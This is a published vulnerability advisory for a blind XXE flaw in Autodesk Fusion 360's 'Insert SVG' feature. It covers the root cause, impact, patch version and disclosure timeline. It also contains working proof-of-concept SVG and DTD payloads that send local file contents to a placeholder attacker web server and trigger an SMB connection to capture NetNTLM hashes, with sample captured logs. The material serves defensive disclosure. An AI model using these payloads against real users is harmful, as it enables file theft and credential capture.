Autodesk Fusion 360 <= 2.0.12887 “Insert SVG” Blind XXE

The “Insert SVG” feature of Autodesk Fusion 360 <= 2.0.12887 is affected by a Blind XML External Entities (XXE). An attacker able to force a victim into loading a malicious SVG in Autodesk Fusion 360 could obtain their NetNTLM hash and the partial content (first line) of the files stored on their client.

Product description (from vendor)

“Fusion 360 is a cloud-based 3D modeling, CAD, CAM, CAE, and PCB software platform for product design and manufacturing.” More information is available at https://www.autodesk.com/products/fusion-360/overview

CVE

  • CVE-2022-TBA

Root cause analysis

The “Insert SVG” feature parses the SVG using an XML parser which has the external entities loading enabled, therefore it is possible to force the XML parser into performing SMB and/or HTTP(S) requests.

Proof of Concept - 1

  1. Setup a web server in order to check incoming HTTP requests
  2. Create a new file named “import.svg” with the following content by replacing <attacker_webserver> with web server created at step 1
1
2
3
4
5
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE a [
   <!ENTITY % asd SYSTEM "http://<attacker_webserver>/oob_exfil.dtd"> 
   %asd;  
]>
  1. Create a file called “oob_exfil.dtd” adding the following content by replacing <attacker_webserver> with web server created at step 1
1
2
3
4
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<attacker_webserver>/%file;'>">
%eval;
%exfiltrate;
  1. Host the file created at step 3 in the web root of the web server and name it oob_exfil.dtd
  2. Open Autodesk Fusion 360 and create a new project
  3. Navigate to “Insert > Insert SVG”
  4. Click the button “Insert from my computer..”
  5. Select the SVG created at step 2
  6. Select random axes where the application will try to load the missing sketch from the SVG
  7. Ignore the error messages and check the web server logs
  8. Notice in that the first line of the C:/Windows/win.ini file has been sent to the web server.
1.3.3.7 - - [25/Feb/2022 18:40:23] "GET /oob_exfil.dtd HTTP/1.0" 200 -
1.3.3.7 - - [25/Feb/2022 18:40:23] code 400, message Bad request version ('support')
1.3.3.7 - - [25/Feb/2022 18:40:23] "GET /; for 16-bit app support" 400 -

Proof of Concept - 2

  1. Setup an SMB server (i.e. using the smbserver.py script of the Impacket project)
  2. Create a new file named “import.svg” with the following content by replacing <attacker_smbserver> with SMB server created at step 1
1
2
3
4
5
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE a [
   <!ENTITY % asd SYSTEM 'file:////<attacker_smbserver>/test'> 
   %asd;  
]>
  1. Open Autodesk Fusion 360 and create a new project
  2. Navigate to “Insert > Insert SVG”
  3. Click the button “Insert from my computer..”
  4. Select the SVG created at step 2
  5. Select random axes where the application will try to load the missing sketch from the SVG
  6. Ignore the error messages and check the SMB server logs
  7. Notice that an SMB connection has been triggered and that the NetNTLM hash of the user executing the vulnerable software has been received
[SMB] NTLMv2-SSP Client   : ::ffff:1.3.3.7
[SMB] NTLMv2-SSP Username : COMPUTER\vitim
[SMB] NTLMv2-SSP Hash     : victim::COMPUTER:1122334455667788:A09FA...SNIP..

Impact

An attacker could:

  • Obtain the public IP address of the victim.
  • Read the first line of local files stored on the victim’s device.
  • Obtain the NetNTLM hash of the current user (and eventually relay/crack it).

Remediation

Upgrade Autodesk Fusion 360 to version 2.1.10903 or later. (Note: we didn’t verify the patch.)

Disclosure timeline

  • 25/02/2022: Submission to Autodesk via HackerOne’s VDP
  • 28/02/2022: Autodesk acknowledged the vulnerability and started working on a fix
  • 26/04/2022: Autodesk closed the report as resolved after releasing the fixed version (2.1.10903)
  • 09/06/2022: Shielder’s advisory is made public

Credits

Giulio `linset` Casciaro from Shielder

This advisory was first published on https://www.shielder.com/advisories/autodesk-fusion-import-svg-blind-xxe/

Date

9 June 2022